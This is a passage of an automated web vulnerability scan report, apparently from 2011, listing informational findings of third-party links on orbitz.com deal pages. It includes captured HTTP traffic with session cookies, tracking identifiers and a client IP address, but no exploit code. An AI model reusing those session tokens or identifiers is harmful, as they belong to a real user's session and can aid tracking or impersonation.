Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=DB8F2D7C1C20F467ABBD861DD298C7C5; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy||||||||||mm/dd/yy|||||||||||||||||||||||||||||||||||||||||||advanced_search|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:27 GMT; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:26 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 61264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext5&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext6&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext7&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext8&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="ad" id="ad519x120">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=120&rotator=module&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.338. http://www.orbitz.com/App/GDDC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/GDDC

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/GDDC?deal_id=airtran-airways-flight-deal&type=bo_qs

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://platform.twitter.com/widgets.js
http://twitter.com/orbitz
http://twitter.com/share
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662818389&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662818389&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662818389&dsrc=7&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=F16847533E57975D98FAE3F2C4C87A82; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:58 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 34861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<td><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://www.orbitz.com/App/GDDC?deal_id=airtran-airways-flight-deal&wt.tsrc=Twitter" data-text="Flights on sale from $118* round-trip (+ txs/fees) with this AirTran fare sale" data-count="none" data-via="Orbitz">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662818389&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662818389&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662818389&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...

17.339. http://www.orbitz.com/App/GDDC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/GDDC

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/GDDC?deal_id=aeromexico-winter-fares\

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif
http://us.rd.yahoo.com/my/atm/Orbitz.com/Car%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/cardeals.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Cruise%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/cruises.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Flight%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/flightdeals.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotel%20Property%20Offers/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/hotelpromos.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/New!%20Top%20Hotel%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-hotels.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Top%20Flight%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-flights.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Deals/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/topdeals-vacationpackages.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Packages%20by%20Destination/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/lowestpackages.rss.xml
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=300x200_dow&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&

Request

GET /App/GDDC?deal_id=aeromexico-winter-fares\ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; 